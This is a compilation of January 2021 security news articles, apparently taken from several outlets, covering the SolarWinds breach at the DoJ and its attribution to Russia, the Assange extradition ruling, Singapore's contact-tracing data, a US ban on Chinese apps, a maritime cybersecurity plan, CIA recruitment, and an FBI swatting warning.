The US DoJ revealed that threat actors behind the SolarWinds attack have gained access to roughly 3% of the department’s O365 mailboxes.
The US Department of Justice (DoJ) published a press release to confirm that the threat actors behind the SolarWinds supply chain attack were able to access thousands of mailboxes of its employees.
“On Dec. 24, 2020, the Department of Justice’s Office of the Chief Information Officer (OCIO) learned of previously unknown malicious activity linked to the global SolarWinds incident that has affected multiple federal agencies and technology contractors, among others. This activity involved access to the Department’s Microsoft O365 email environment.” reads the update provided by the DoJ on the SolarWinds attack.
“After learning of the malicious activity, the OCIO eliminated the identified method by which the actor was accessing the O365 email environment. At this point, the number of potentially accessed O365 mailboxes appears limited to around 3-percent and we have no indication that any classified systems were impacted.”
DoJ confirmed the number of potentially accessed O365 mailboxes is around 3-percent, it also added that government experts are not aware of impacted classified systems.
considering that the DoJ has around 115,000 employees, this implies that attackers gained access to roughly 3450 mailboxes. The DOJ announced to have lockout the intruders.
“As part of the ongoing technical analysis, the Department has determined that the activity constitutes a major incident under the Federal Information Security Modernization Act, and is taking the steps consistent with that determination. The Department will continue to notify the appropriate federal agencies, Congress, and the public as warranted.”” concludes the press release.
The US agencies FBI, CISA, ODNI, and the NSA released a joint statement that blames Russia for the SolarWinds supply chain attack.
On behalf of President Trump, the four agencies were part of the task force Cyber Unified Coordination Group (UCG) that is coordinating the investigation and remediation of the SolarWinds hack that had a significant impact on federal government networks. The UCG’s investigation is still ongoing to determine the scope of the incident.
According to the UCG’s statement, the attack was orchestrated by an Advanced Persistent Threat (APT) actor, likely Russian in origin.
Recently the US Cybersecurity and Infrastructure Security Agency (CISA) has updated its official guidance to order US federal agencies to update the SolarWinds Orion platforms by the end of the year.
Justice Department Says It's Been Affected by Russian Hack
7.1.2021 BigBrothers Securityweek
The Justice Department disclosed on Wednesday that it was among the federal agencies harmed by a massive breach of government networks that U.S. officials have linked to Russia.
The extent of the damage was unclear. The department said that 3% of its Microsoft Office 365 email accounts were potentially affected, but did not say to whom those accounts belonged. There are no indications that classified systems were affected, the agency said.
The department said it detected on Dec. 24 “previously unknown malicious activity” linked to the broader intrusions of federal agencies revealed earlier that month, according to a statement from spokesman Marc Raimondi.
The statement came one day after federal law enforcement and intelligence agencies formally implicated Russia in the intrusions, which officials said were part of a suspected intelligence gathering operation. President Donald Trump had previously raised without evidence the idea that China could be to blame.
The hacking campaign was extraordinary in scale, with the intruders having stalked through government agencies, defense contractors and telecommunications companies for months by the time the breach was discovered. Experts say that gave the foreign agents ample time to collect data that could be highly damaging to U.S. national security, though the scope of the breaches and exactly what information was sought is unknown.
An estimated 18,000 organizations were affected by malicious code that piggybacked on popular network-management software from an Austin, Texas, company called SolarWinds. Of those customers, though, “a much smaller number has been compromised by follow-on activity on their systems,” the statement said, noting that fewer than 10 federal government agencies have so far been identified as falling into that category.
U.S. Government Announces 'Hack the Army 3.0' Bug Bounty Program
7.1.2021 BigBrothers Securityweek
The U.S. government on Wednesday announced the launch of another bug bounty program conducted in collaboration with hacker-powered cybersecurity platform HackerOne.
Hack the Army 3.0, whose goal is to help the U.S. Army secure its digital assets and protect its systems against cyberattacks, takes place between January 6 and February 17, and it’s open to both millitary and civilian white hat hackers. However, only civilians are eligible for financial rewards if they find vulnerabilities.
The program, conducted by the Defense Digital Service (DDS), is invitation-only, so not everyone can participate, but the Department of Defense does have an ongoing vulnerability disclosure program through which anyone can report security holes at any time in exchange for “thanks.”
“Bug bounty programs are a unique and effective 'force multiplier' for safeguarding critical Army networks, systems and data, and build on the efforts of our Army and DoD security professionals,” said Brig. Gen. Adam C. Volant, who is the director of operations at the U.S. Army Cyber Command. “By 'crowdsourcing' solutions with the help of the world's best military and civilian ethical hackers, we complement our existing security measures and provide an additional means to identify and fix vulnerabilities. Hack the Army 3.0 builds upon the successes and lessons of our prior bug bounty programs.”
The DDS has conducted 14 public bug bounties covering public-facing websites and apps, and 10 private programs covering internal assets. In the previous Hack the Army program, which ran in October and November 2019, the government paid out $275,000 in rewards for 146 valid vulnerabilities.
The Pentagon also paid out $290,000 last year for more than 400 vulnerabilities as part of its Hack the Air Force 4.0 program.
The Defense Department’s first bug bounty program was announced in 2016 and the initiatives launched since have resulted in the patching of thousands of vulnerabilities and millions of dollars being paid out.
SolarWinds Hackers Also Accessed U.S. Justice Department's Email Server
7.1.2021 BigBrothers Thehackernews
The U.S. Department of Justice on Wednesday became the latest government agency in the country to admit its internal network was compromised as part of the SolarWinds supply chain attack.
"On December 24, 2020, the Department of Justice's Office of the Chief Information Officer (OCIO) learned of previously unknown malicious activity linked to the global SolarWinds incident that has affected multiple federal agencies and technology contractors, among others," DoJ spokesperson Marc Raimondi said in a short statement. "This activity involved access to the Department's Microsoft Office 365 email environment."
Calling it a "major incident," the DoJ said the threat actors who spied on government networks through SolarWinds software potentially accessed about 3% of the Justice Department's email accounts, but added there's no indication they accessed classified systems.
The disclosure comes a day after the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA) issued a joint statement formally accusing an adversary "likely Russian in origin" for staging the SolarWinds hack.
The agencies described the entire SolarWinds operation as "an intelligence gathering effort."
The espionage campaign, which originated in March 2020, worked by delivering malicious code that piggybacked on SolarWinds network-management software to as many as 18,000 of its customers, although additional intrusive activity is believed to have been conducted only against select targets.
In a separate development, The New York Times, Reuters, and The Wall Street Journal reported intelligence bureaus are probing the possibility that JetBrains' TeamCity software distribution system was breached and "used as a pathway for hackers to insert back doors into the software of an untold number of technology companies."
TeamCity is a build management and continuous integration server offered by the Czech software development company. JetBrains counts 79 of the Fortune 100 companies as its customers, including SolarWinds.
But in a blog post published by its CEO Maxim Shafirov, the company denied being involved in the attack in any way, or that it was contacted by any government or security agency regarding its role in the security incident.
"SolarWinds is one of our customers and uses TeamCity, which is a Continuous Integration and Deployment System, used as part of building software," Shafirov said. "SolarWinds has not contacted us with any details regarding the breach and the only information we have is what has been made publicly available."
Shafirov also stressed that in the event if TeamCity had been used to compromise SolarWinds, it could be due to a misconfiguration, and not a specific vulnerability.
FBI, CISA, ODNI and NSA blames Russia for SolarWinds hack
6.1.2021 BigBrothers Securityaffairs
A joint statement issued by US security agencies confirmed that Russia was likely the origin of the SolarWinds supply chain attack.
The US agencies FBI, CISA, ODNI, and the NSA released a joint statement that blames Russia for the SolarWinds supply chain attack.
On behalf of President Trump, the four agencies were part of the task force Cyber Unified Coordination Group (UCG) that is coordinating the investigation and remediation of the SolarWinds hack that had a significant impact on federal government networks. The UCG’s investigation is still ongoing to determine the scope of the incident.
According to the UCG’s statement, the attack was orchestrated by an Advanced Persistent Threat (APT) actor, likely Russian in origin.
“This work indicates that an Advanced Persistent Threat (APT) actor, likely Russian in origin, is responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks.” reads the statement. “At this time, we believe this was, and continues to be, an intelligence gathering effort.”
The UCG confirmed that approximately 18,000 customers of Solar Winds’ Orion product were impacted, but only a smaller number of them have been compromised. The Government experts also identified fewer than ten U.S. government agencies that were impacted.
The statement dismantles President Donald Trump’s claim that the attack was orchestrated by China-linked actors and confirms the report published by the Washington Post that blames the Russia-linked APT29 group.
Recently the US Cybersecurity and Infrastructure Security Agency (CISA) has updated its official guidance to order US federal agencies to update the SolarWinds Orion platforms by the end of the year.
The Russian Government has denied involvement in the hack.
Singapore Admits Police Can Access Contact-Tracing Data
6.1.2021 BigBrothers Securityweek
Singapore has admitted data collected for contact-tracing can be accessed by police despite earlier assurances it would only be used to fight the coronavirus, sparking privacy concerns Tuesday about the scheme.
The city-state has a programme called "TraceTogether" for tracking close contacts of Covid-19 patients, that works via both a phone app and a dongle.
Take-up was initially slow due to privacy worries but rose to almost 80 percent of residents after government assurances and a decision to make its use mandatory for accessing some public places like malls.
However, a senior official admitted in parliament that police could "obtain any data" -- including information gathered through the contact-tracing programme -- in the course of a criminal investigation.
Foreign Minister Vivian Balakrishan said later that, to his knowledge, police had so far only accessed contact-tracing data on one occasion, during a murder probe.
Human Rights Watch accused the government, which is regularly criticised for curtailing civil liberties, of "undermining the right to privacy".
The admission "exposes how the government has been covertly exploiting the pandemic to deepen its surveillance and control over the population," Phil Robertson, the group's Asia deputy director, told AFP.
Singaporean freelance journalist and activist Kirsten Han said she was disappointed but not surprised.
"Looking at the government's record, I felt that it would be quite predictable that if they can do it, they will," said Han.
"It's unfair and shows how little protection we have for our privacy against the government."
Speaking in parliament Tuesday, Balakrishan said the government was just being open when it made the admission.
"We want to be completely above board and transparent," he said.
But there was much anger online, with some Singaporeans saying they felt betrayed. The city-state has only suffered a mild outbreak, with about 58,000 cases and 29 deaths.
Many countries have rolled out contact-tracing programmes that work via a smartphone app, but take-up has been low in some due to privacy concerns.
Trump Widens US Ban on Chinese Apps as His Term Nears End
6.1.2021 BigBrothers Securityweek
President Donald Trump has signed an executive order banning transactions with eight Chinese apps including Alipay and WeChat Pay in an escalation of a trade war that has been unfolding through most of his term.
The order, however, goes into effect in 45 days, nearly a month after Joe Biden will be inaugurated as the next president, so the fate of Trump’s action is unclear.
The orders follow two others Trump signed in August banning dealings with the popular video app TikTok as well as the main WeChat messaging app. The fate of those apps in the U.S. is still unclear, and with just 15 days left until Inauguration Day, it will likely fall to Biden to deal with them — or not. The same goes for Tuesday’s executive order.
A representative for Biden’s office did not immediately return a message for comment Tuesday.
Alipay is a widely used digital wallet that is part of the empire of e-commerce billionaire and Ant Group founder Jack Ma. WeChat Pay is a rival service operated by tech giant Tencent. The others named in the order are CamScanner, QQ Wallet, SHAREit, Tencent QQ, VMate and WPS Office.
Trump’s order cites unspecified concerns about the apps collecting Americans’ personal and financial information and turning it over to China’s communist government.
The order marks the Trump administration’s latest attempt to hobble China, a rising economic superpower. Over the past several years, it has lashed out at China with tariffs that have sometimes roiled the U.S. stock market, blocked mergers involving Chinese companies and stifled the business of Chinese firms like Huawei, a maker of phones and telecom equipment.
China-backed hackers, meanwhile, have been blamed for data breaches of U.S. federal databases and the credit agency Equifax, and the Chinese government strictly limits what U.S. tech companies can do in China.
Political analysts expect Biden to try to resume cooperation with Beijing on issues such as climate change and the coronavirus. However, economists and political analysts foresee few big changes due to widespread frustration with Beijing’s trade and human rights record and accusations of spying and technology theft.
But dealing with the fallout from Trump’s latest shot at China could still create more headaches for Biden on top of the ongoing efforts to fight a worsening pandemic after he takes office.
Senior Trump administration officials indicated they hadn’t consulted with the president-elect’s team before issuing the latest effort to ban more China apps. They described the apps as instruments for a communist government bent on “digital totalitarianism.”
When reporters asked why the administration was only taking these steps now with the Trump presidency down to its final two weeks, one official said the executive action should have probably been taken years ago, “but better late than never.” The officials spoke on condition of anonymity because they were not authorized to discuss the executive action publicly.
National Security Adviser Robert C. O’Brien framed the order as part of Trump’s ongoing effort to “prioritize the safety and security of the United States homeland and the American people.”
Trump’s tariffs and orders against China have raised recurring fears among U.S. tech companies and their stockholders that China’s government will retaliate by making it more difficult to do business in the world’s most populous country. If that were to happen, among those that could be particularly hard hit is Apple, which generated $40 billion in sales in China in its last fiscal year — making it the iPhone maker’s third largest market behind the U.S. and Europe.
Despite the worries of a backlash, Apple has emerged largely unscathed from Trump’s battel with China, enabling it to boost its market value above $2 trillion amid the pandemic.
US: Hack of Federal Agencies 'Likely Russian in Origin'
6.1.2021 BigBrothers Securityweek
Top national security agencies in a rare joint statement Tuesday confirmed that Russia was likely responsible for a massive hack of U.S. government departments and corporations, rejecting President Donald Trump’s claim that China might be to blame.
The statement represented the U.S. government’s first formal attempt to assign responsibility for the breaches at multiple agencies and to assign a possible motive for the operation. It said the hacks appeared to be intended for “intelligence-gathering,” suggesting the evidence so far pointed to a Russian spying effort rather than an attempt to damage or disrupt U.S. government operations.
“This is a serious compromise that will require a sustained and dedicated effort to remediate,” said the statement, distributed by a cyber working group comprised of the FBI and other investigative agencies.
The hacking campaign amounts to Washington’s worst cyberespionage failure to date. The intruders had been stalking through government agencies, defense contractors and telecommunications companies for at least seven months when it was discovered. Experts say that gave the foreign agents ample time to collect data that could be highly damaging to U.S. national security, though the scope of the breaches and exactly what information was sought is unknown.
The hacking campaign was extraordinary in its scale — 18,000 organizations were infected earlier this year by malicious code that piggybacked on popular network-management software from an Austin, Texas, company called SolarWinds. Of those 18,000 customers, the statement said, “a much smaller number have been compromised by follow-on activity on their systems,” with fewer than 10 federal government agencies falling into that category.
Related: Continuous Updates - Everything You Need to Know About the SolarWinds Supply Chain Attack
The Treasury and Commerce departments are among the agencies to have been affected. Sen. Ron Wyden, an Oregon Democrat, said after a briefing last month to the Senate Finance Committee that dozens of email accounts within the Treasury Department had been compromised and that hackers had broken into systems used by the department’s highest-ranking officials.
A senior executive of the cybersecurity firm that discovered the malware, FireEye, said last month that “dozens of incredibly high-value targets” have been infiltrated by elite, state-backed hackers. The executive, Charles Carmakal, would not name the targets. Nor has Microsoft, which says it identified more than 40 compromised government and private targets, most in the U.S.
U.S. officials, including then-Attorney General William Barr and Secretary of State Mike Pompeo, and cybersecurity experts have previously said Russia was to blame. But Trump, in a series of tweets late last month, sought to downplay the severity of the hack and raised the unsubstantiated idea that China could be responsible.
Tuesday’s statement makes clear that is not the case, saying the intrusions are likely “Russian in origin.”
Russia has denied involvement in the hack.
U.S. Releases Cybersecurity Plan for Maritime Sector
6.1.2021 BigBrothers Securityweek
The U.S. government has released a plan with a list of top-priority items to mitigate threats and provide security to the crucial maritime sector.
The National Maritime Cybersecurity Plan, which was made public (PDF) on Tuesday, highlights several priority actions to close maritime cybersecurity gaps and vulnerabilities over the next five years.
The maritime sector, which includes hundreds of thousands of major waterways, shipyards, ports and bridges, contributes about $5.4 trillion to the U.S. gross domestic product.
At a high level, the plan sets out priorities and goals around the establishment of global standards to define maritime threats, beefing up threat intel and information sharing, and increasing the cybersecurity workforce in the maritime sector.
OT Network Segmentation
“The proliferation of IT across the maritime sector is introducing previously unknown risks, as evidenced by the June 2017 NotPetya cyber-attack, which crippled the global maritime industry for more than a few days,” the White House said.
“This plan articulates how the United States government can best buy down the potential catastrophic risks to national security and economic prosperity,” the government said, noting that the increasing reliance on IT and OT will continue to promote maritime commerce efficiency and reliability.
The plan calls for a high priority to be placed on what is described as deconflicting government roles and responsibilities.
“Some MTS operators lack the ability to control the security of critical systems because different public and private entities own and operate these interconnected systems. Although cybersecurity standards and frameworks are widely available, businesses often lack the resources or expertise to implement them effectively, leaving them vulnerable to cybersecurity disruptions,” the U.S. government warned.
Because no single entity owns, controls, manages, or regulates businesses or networks used throughout the maritime domain, the plan calls for the NSC (National Security Council) staff to identify gaps in legal authorities and identify efficiencies to de-conflict roles and responsibilities for MTS cybersecurity standards.
The plan's other priorities include developing risk modeling to inform maritime cybersecurity standards and best practices; strengthening cybersecurity requirements in port services contracts and leasing; and improve the level of information sharing between the U.S. government and the private sector.
"Credible and actionable intelligence is required to strengthen maritime cybersecurity,” the government asserted, noting it will create mechanisms to share unclassified, and when acceptable, classified information with maritime industry stakeholders, increasing access to actionable information to protect maritime IT and OT networks.
Furthermore, the plan calls for the creation of an international "port OT risk framework" based on input from partners, which will be promoted internationally.
The plan also zeroes in on producing cybersecurity specialists and a robust workforce to manage and protect port and vessel systems.
"The dual threat of opportunistic ransomware infection and targeted nation state power projection over the past few years has demonstrated the impact of cyber attacks on national security and commercial supply chains," Grant Geyer, Chief Product Officer at industrial cybersecurity firm Claroty, told SecurityWeek. "We saw examples of the potential for massive disruption during the 2017 NotPetya infections in commercial maritime enterprises, and Iran’s revelation that their port activities were disrupted by a cyber attack in 2020."
"Coupling these highly vulnerable OT maritime environments with a severe lack of expertise in OT security," Geyer continued, "creates the potential for massive risk to critical infrastructure. What strikes me as very important about the National Maritime Cybersecurity Plan is the purposeful focus on ensuring risk mitigation to the critical ships and port systems, and the focus on developing expertise and career paths for maritime cybersecurity."
CIA's New Recruitment Website Aims to Diversify Spy Agency
6.1.2021 BigBrothers Securityweek
Striving to further diversify its ranks, the CIA launched a new website Monday to find top-tier candidates who will bring a broader range of life experiences to the nation’s premier intelligence agency
The days of all American spies being white male graduates from Ivy League schools are long gone. The CIA director is a woman and women head all five of the agency’s branches, including the directorates of science and technology, operations and digital innovation.
But while the CIA has been diversifying for years, intelligence agencies still lag the federal workforce in minority representation. With thousands of job applicants annually, the CIA wants to do more to ensure its workforce reflects national demographics.
The revamped website has links for browsing CIA jobs complete with starting salaries and requirements, sections on working at the agency, and a streamlined application process.
“We’ve come a long way since I applied by simply mailing a letter marked ‘CIA, Washington, D.C.,’” said CIA Director Gina Haspel, who joined the agency in 1985. She said in a statement that she hopes the new website piques the interest of talented Americans and gives them a sense of the “dynamic environment that awaits them here.”
Haspel has made recruitment a priority since she became the first female director in May 2018. Since then, the CIA has started advertising on streaming services, launched an Instagram account and an online “onion site,” a feature that makes both the information provider and the person accessing information more difficult to trace.
Last year, the CIA designated its first executive for Hispanic engagement, Ilka Rodriguez-Diaz, a veteran of more than three decades with the agency. She first joined after attending a CIA job fair in New Jersey.
“The CIA had never been on my radar,” she wrote in an op-ed in The Miami Herald after getting the job in October. “I didn’t think I fit the ‘profile.’ After all, the spies I saw on TV were male Anglo-Saxon Ivy leaguers, not Latinas from New Jersey. Still, I went to my expert life coach, my mother, for advice. She said, ‘No pierdes nada con ir.’ (What have you got to lose in going?) So, I went to the job fair. The rest, as they say, is history.”
Across the more than a dozen U.S. spy agencies, including the CIA, 61% of intelligence professionals in fiscal 2019 were men compared with 39% women, according to an annual demographics report compiled by the Office of the Director of National Intelligence.
In fiscal 2019, the intelligence community saw an incremental increase in the number of minority professionals — 26.5%, up from 26.2%. But that’s still lower than 37 percent in the federal workforce as a whole and 37.4 percent in the civilian labor force, the report said.
The largest minority or ethnic group at all the intelligence agencies, including the CIA, was Black or African American at 12% followed by Hispanic at 7% and Asian at 4%. Persons with disabilities represent 11.5% of the workforce at all the U.S. intelligence agencies — up a point from the year before.
“Even with all the challenges 2020 posed, it was a standout recruitment year for CIA. Our incoming class is the third largest in a decade and represents the most diverse talent pool, including persons with disabilities, since 2010,” said CIA spokesperson Nicole de Haay.
A Government Accountability Office report to congressional committees in December said the intelligence community as a whole needs to take additional steps to enhance diversity.
“Over the past several years, the intelligence community has demonstrated its commitment to diversity by taking steps to increase the proportion of women, racial or ethnic minorities and persons with disabilities” within the workforce, the report said. “Although some progress has been made in increasing this representation throughout the intelligence community, representation remains below comparable benchmarks.”
FBI, CISA, NSA Officially Blame Russia for SolarWinds Cyber Attack
6.1.2021 BigBrothers Thehackernews
The U.S. government on Tuesday formally pointed fingers at the Russian government for orchestrating the massive SolarWinds supply chain attack that came to light early last month.
"This work indicates that an Advanced Persistent Threat (APT) actor, likely Russian in origin, is responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks," the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA) said in a joint statement.
Russia, however, denied any involvement in the operation on December 13, stating it "does not conduct offensive operations in the cyber domain."
The FBI, CISA, ODNI, and NSA are members of the Cyber Unified Coordination Group (UCG), a newly-formed task force put in place by the White House National Security Council to investigate and lead the response efforts to remediate the SolarWinds breach.
A Much Smaller Number Compromised
Calling the campaign an "intelligence gathering effort," the intelligence bureaus said they are currently working to understand the full scope of the hack while noting that fewer than 10 U.S. government agencies were impacted by the compromise.
The names of the affected agencies were not disclosed, although previous reports have singled out the U.S. Treasury, Commerce, State, and the Departments of Energy and Homeland Security among those that have detected tainted SolarWinds' network management software installations, not to mention a number of private entities across the world.
An estimated 18,000 SolarWinds customers are said to have downloaded the backdoored software update, but the UCG said only a smaller number had been subjected to "follow-on" intrusive activity on their internal networks.
Microsoft's analysis of the Solorigate modus operandi last month found that the second-stage malware, dubbed Teardrop, has been selectively deployed against targets based on intel amassed during an initial reconnaissance of the victim environment for high-value accounts and assets.
The joint statement also confirms previous speculations that linked the espionage operation to APT29 (or Cozy Bear), a group of state-sponsored hackers associated with the Russian Foreign Intelligence Service (SVR).
The hacking campaign was notable for its scale and stealth, with the attackers leveraging the trust associated with SolarWinds Orion software to spy on government agencies and other companies for at least nine months, including viewing source code and stealing security tools, by the time it was discovered.
SolarWinds Faces Class Action Lawsuit
Meanwhile, SolarWinds is facing further fallout after a shareholder of the IT infrastructure management software company filed a class-action lawsuit in the U.S. District Court for the Western District of Texas on Monday against its president, Kevin Thompson, and chief financial officer, J. Barton Kalsu, claiming the executives violated federal securities laws under the Securities Exchange Act of 1934.
The complaint states that SolarWinds failed to disclose that "since mid-2020, SolarWinds Orion monitoring products had a vulnerability that allowed hackers to compromise the server upon which the products ran," and that "SolarWinds' update server had an easily accessible password of 'solarwinds123'," as a result of which the company "would suffer significant reputational harm."
British Court rejects the US’s request to extradite Julian Assange
5.1.2021 BigBrothers Securityaffairs
A British court has rejected the request of the US government to extradite Wikileaks founder Julian Assange to the country.
WikiLeaks founder Julian Assange should not be extradited to the US to stand trial, the Westminster Magistrates’ Court has rejected the US government’s request to extradite him on charges related to illegally obtaining and sharing classified material about national security.
Assange faces multiple criminal charges under America’s Espionage Act and Computer Fraud and Abuse Act.
Judge Vanessa Baraitser denied the extradition due to suicide risk for the impression he could suffer in the U.S. prison.
“That extradition should be refused because it would be unjust and oppressive by reason of Mr. Assange’s mental condition and the high risk of suicide pursuant to section 91 of the EA 2003;” said District Judge (Magistrates’ Court) Vanessa Baraitser In the Westminster Magistrates’ Court.
“Taking account of all of the information available to him, he considered Mr Assange’s risk of suicide to be very high should extradition become imminent. This was a well-informed opinion carefully supported by evidence and explained over two detailed reports.”
Of course, the U.S. government will likely appeal the decision.
Wikileaks founder is currently facing extradition to the United States for his role in one of the largest compromises of classified information in the history of the United States. He published thousands of classified diplomatic and military documents on WikiLeaks in 2010.
For the first time, US DoJ charges an individual under the 102-year-old Act that persecutes the disclosure of national defense information that could be used against the United States.
According to the DoJ, the WikiLeaks founder conspired and tried to recruit Anonymous and LulzSec hacker to steal confidential and secret data on his behalf. In 2010, Assange gained unauthorized access to a government computer system of a NATO country and years later he contacted s LulzSec leader who was working for the FBI and provided him a list of targets.
The US authorities also accuse Assange of having conspired with Army intelligence analyst Chelsea Manning to crack a password hash for an Army computer to access classified documents that were later published on the WikiLeaks website.
In April 2019, WikiLeaks founder Julian Assange has been arrested at the Ecuadorian Embassy in London after Ecuador withdrew asylum after seven years.
In 2012 a British judge ruled WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the last years in its London embassy.
In May 2019, the WikiLeaks founder has been sentenced to 50 weeks in prison for breaching his bail conditions in 2012 and finding asylum into Ecuador’s London embassy for more than seven years.
A few weeks later, the United States Department of Justice charged Assange with 18 counts on the alleged violation of the Espionage Act.
UK Judge Refuses US Extradition of WikiLeaks Founder Assange
5.1.2021 BigBrothers Securityweek
A British judge on Monday rejected the United States’ request to extradite WikiLeaks founder Julian Assange to face espionage charges, saying he was likely to kill himself if held under harsh U.S. prison conditions.
In a mixed ruling for Assange and his supporters, District Judge Vanessa Baraitser rejected defense arguments that the 49-year-old Australian faces a politically motivated American prosecution that rides roughshod over free-speech protections. But she said Assange’s precarious mental health would likely deteriorate further under the conditions of “near total isolation” he would face in a U.S. prison.
“I find that the mental condition of Mr. Assange is such that it would be oppressive to extradite him to the United States of America,” the judge said.
She said Assange was “a depressed and sometimes despairing man” who had the “intellect and determination” to circumvent any suicide prevention measures taken by American prison authorities.
The U.S. government said it would appeal the decision. Assange’s lawyers said they would ask for his release from a London prison where he has been held for more than a 18 months at a bail hearing on Wednesday.
Assange, who sat quietly in the dock at London’s Central Criminal Court for the ruling, wiped his brow as the decision was announced. His partner Stella Moris, with whom he has two young sons, wept.
Outside court, Moris said the ruling was “the first step towards justice,” but it was not yet time to celebrate.
“I had hoped that today would be the day that Julian would come home,” she said. “Today is not that day, but that day will come soon.”
The ruling marks a dramatic moment in Assange’s years-long legal battles in Britain — though likely not its final chapter.
It’s unclear whether the incoming Biden administration will pursue the prosecution, initiated under President Donald Trump.
Assange’s American lawyer, Barry Pollack, said the legal team was “enormously gratified” by the British court’s decision.
“We hope that after consideration of the U.K. court’s ruling, the United States will decide not to pursue the case further,” he said.
Moris urged Trump to pardon Assange before he leaves office later this month.
“Mr. President, tear down these prison walls,” she said. “Let our little boys have their father.”
U.S. prosecutors have indicted Assange on 17 espionage charges and one charge of computer misuse over WikiLeaks’ publication of leaked military and diplomatic documents a decade ago. The charges carry a maximum sentence of 175 years in prison.
Lawyers for Assange argue that he was acting as a journalist and is entitled to First Amendment protections of freedom of speech for publishing documents that exposed U.S. military wrongdoing in Iraq and Afghanistan.
Lawyers for the U.S. government denied that Assange was being prosecuted merely for publishing, saying the case “is in large part based upon his unlawful involvement” in the theft of the diplomatic cables and military files by U.S. Army intelligence analyst Chelsea Manning.
The British judge sided with U.S. lawyers on that score, saying Assange’s actions, if proven, would “amount to offenses in this jurisdiction that would not be protected by his right to freedom of speech.” She also said the U.S. judicial system would give him a fair trial.
The defense also argued during a three-week hearing in the fall that Assange risked “a grossly disproportionate sentence” and detention in “draconian and inhumane conditions” if he was sent to the United States,
The judge agreed that U.S. prison conditions would be oppressive. She accepted evidence from expert witnesses that Assange had a depressive disorder and an autism spectrum disorder.
“I accept that oppression as a bar to extradition requires a high threshold. ... However, I am satisfied that, in these harsh conditions, Mr. Assange’s mental health would deteriorate causing him to commit suicide with the ‘single minded determination’ of his autism spectrum disorder,” the judge said in her ruling.
The prosecution of Assange has been condemned by journalists and human rights groups, who say it undermines free speech around the world.
They welcomed the judge’s decision, even though it was not made on free-speech grounds.
“This is a huge relief to anyone who cares about the rights of journalists,” The Freedom of the Press Foundation tweeted.
Assange’s legal troubles began in 2010, when he was arrested in London at the request of Sweden, which wanted to question him about allegations of rape and sexual assault made by two women. In 2012, Assange jumped bail and sought refuge inside the Ecuadorian Embassy, where he was beyond the reach of U.K. and Swedish authorities — but also effectively a prisoner, unable to leave the tiny diplomatic mission in London’s tony Knightsbridge area.
The relationship between Assange and his hosts eventually soured, and he was evicted from the embassy in April 2019. British police immediately arrested him for breaching bail in 2012.
Sweden dropped the sex crimes investigations in November 2019 because so much time had elapsed, but Assange has remained in London’s high-security Belmarsh Prison throughout his extradition hearing.
British Court Rejects U.S. Request to Extradite WikiLeaks' Julian Assange
5.1.2021 BigBrothers Thehackernews
A British court has rejected the U.S. government's request to extradite Wikileaks founder Julian Assange to the country on charges pertaining to illegally obtaining and sharing classified material related to national security.
In a hearing at Westminster Magistrates' Court today, Judge Vanessa Baraitser denied the extradition on the grounds that Assange is a suicide risk and extradition to the U.S. prison system would be oppressive.
"I find that the mental condition of Mr. Assange is such that it would be oppressive to extradite him to the United States of America," judge Baraitser said in a 132-page ruling.
The U.S. government is expected to appeal the decision.
The case against Assange centers on WikiLeaks' publication of hundreds of thousands of leaked documents about the Afghanistan and Iraq wars, as well as diplomatic cables, in 2010 and 2011.
The documents include "approximately 90,000 Afghanistan war-related significant activity reports, 400,000 Iraq war-related significant activities reports, 800 Guantanamo Bay detainee assessment briefs, and 250,000 U.S. Department of State cables," per the U.S. Department of Justice, which accused Assange of conspiring with Chelsea Manning, a former intelligence analyst in the U.S. Army, to disclose sensitive information related to the national defense.
A federal grand jury last May indicted Assange on 18 counts related to unlawfully obtaining, receiving, and disclosing classified information, and conspiracy to commit computer intrusion to crack a password hash stored on U.S. Department of Defense computers connected to the Secret Internet Protocol Network (SIPRNet), a U.S. government network used to transmit classified documents and communications.
Assange, who sought refuge in the Embassy of Ecuador in London between June 2012 and April 2019 to avoid a warrant against him, was arrested last year after Ecuador withdrew his diplomatic asylum. In May 2019, he was found guilty in a U.K. court of breaching bail conditions and sentenced to 50 weeks, following which the aforementioned indictment was returned in the U.S.
If convicted, Assange faces a maximum penalty of 10 years in prison on each count with the exception of conspiracy to commit computer intrusion, for which he faces a maximum sentence of five years in prison.
The U.S. non-profit Freedom of the Press Foundation tweeted, "The case against Julian Assange is the most dangerous threat to U.S. press freedom in decades. This is a huge relief to anyone who cares about the rights of journalists."
FBI warns swatting attacks on owners of smart devices
3.1.2021 BigBrothers Securityaffairs
The Federal Bureau Investigation (FBI) is warning owners of smart home devices with voice and video capabilities of ‘swatting’ attacks.
The FBI has recently issued an alert to warn owners of smart home devices with voice and video capabilities of so-called “swatting” attacks.
Swatting attacks consist of hoax calls made to emergency services, typically reporting an immediate threat to human life, to trigger an immediate response from law enforcement and the S.W.A.T. team to a specific location.
Unfortunately, the risk for the people associated with these operations is high due to the confusion on the part of homeowners or responding officers. In some cases, these actions have resulted in health-related or violent consequences and of course have a significant impact on the work of law enforcement that was not allocated on real emergencies.
Motivations behind swatting attacks could be revenge, harassment, or prank.
The attackers leverage spoofing technology to anonymize their own phone numbers and make the emergency call as coming from the victim’s phone number.
According to the alert issued by the FBI, the swatters have been hijacking smart devices such as video and audio capable home surveillance devices.
Threat actors likely take advantage of customers’ bad habit of re-using email passwords for their smart device. The offenders use stolen email passwords to log into the smart devices and take over them, is some cases they hijacked the live-stream camera and device speakers.
Swatters then call emergency services to report a crime at the victims’ residence urging the intervention of law enforcement.
“Recently, offenders have been using victims’ smart devices, including video and audio capable home surveillance devices, to carry out swatting attacks. To gain access to the smart devices, offenders are likely taking advantage of customers who re-use their email passwords for their smart device. The offenders use stolen email passwords to log into the smart device and hijack features, including the live-stream camera and device speakers.” reads the alert issued by the FBI.
“They then call emergency services to report a crime at the victims’ residence. As law enforcement responds to the residence, the offender watches the live stream footage and engages with the responding police through the camera and speakers. In some cases, the offender also live streams the incident on shared online community platforms. The FBI is working with private sector partners who manufacture smart devices to advise customers about the scheme and how to avoid being victimized. The FBI is also working to alert law enforcement first responders to this threat so they may respond accordingly.”
